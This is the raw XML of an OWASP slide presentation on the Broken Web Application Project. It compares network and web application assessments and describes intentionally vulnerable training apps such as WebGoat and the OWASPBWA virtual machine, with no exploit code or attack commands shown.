              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Known Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Predictable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application Assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="2174875"/>
            <a:ext cx="4191001" cy="3951288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Methodology is uncertain* </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Assorted approaches </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Assorted tools exist to target the technical side of a web app*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Assorted Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unpredictable Results*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>* Getting better but still not as good as network assessments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3179867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the Difference?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network Assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mature and stable TCP/IP protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well defended by network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>firewalls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(usually)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application Assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>New technologies are constantly emerging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Web Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Mobile platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Different databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>New CMS and Web frameworks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Ruby on Rails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> (Python based)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Node.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Business logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Human element</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1435917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Web Applications</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sz="2800" dirty="0" smtClean="0"/>
              <a:t>Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unintentional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>eb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>pplications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Intentionally broken web applications exist as well</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>frameworks, languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Some available live, others to be downloaded and installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Several vendor provided apps exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Test their product </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Training apps such as the OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> originally written in J2EE now available on other  platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>An interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>teaching environment for web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="510211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Broken Web Application Project Goal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broken Web Applications are needed to know evil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduce people to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>topic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test web application scanner  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>people</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test web application scanner  products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>source code analysis tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test web application firewalls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collect evidence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>left by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>business logic perspectives </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>human </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>element perspectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3408905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Bad Web Apps Challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web sites are built on proprietary systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Back end databases may need licensing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple bad web apps on one system can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>conflict with one another </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be difficult to install </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>be set up in a secured and isolated environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2048343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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DISCLAIMER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>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7772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172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it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASPBWA – A Virtual Machine that is a collection of broken web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Version 1.1.1 released in September 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Available in ova and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Linux Server 10.04 LTS </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99141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7045</TotalTime>
  <Words>1040</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>239</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vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>OWASP Broken Web Application Project</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>Assessing the assessor</vt:lpstr>
      <vt:lpstr>Why the Difference?</vt:lpstr>
      <vt:lpstr>Vulnerable Web Applications</vt:lpstr>
      <vt:lpstr>Broken Web Application Project Goal</vt:lpstr>
      <vt:lpstr>Bad Web Apps Challenges</vt:lpstr>
      <vt:lpstr>DISCLAIMER</vt:lpstr>
      <vt:lpstr>What is it?</vt:lpstr>
      <vt:lpstr>OWASP BWA</vt:lpstr>
      <vt:lpstr>Vicnum</vt:lpstr>
      <vt:lpstr>Demonstration of Vicnum</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Hacking Vicnum </vt:lpstr>
      <vt:lpstr>Cyclone Transfers</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Cyclone Review</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Technical Issues in Web Hacking</vt:lpstr>
      <vt:lpstr>Non Technical Issues in Web Hacking </vt:lpstr>
      <vt:lpstr>Going Forward</vt:lpstr>
      <vt:lpstr>Help needed!</vt:lpstr>
      <vt:lpstr>Wish List</vt:lpstr>
      <vt:lpstr>Questions and Review   </vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP Foundation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dc:title>
  <dc:creator>Mordecai Kraushar</dc:creator>
  <cp:lastModifiedBy>Mordecai Kraushar</cp:lastModifiedBy>
  <cp:revision>86</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-03-30T06:23:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-04-15T02:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>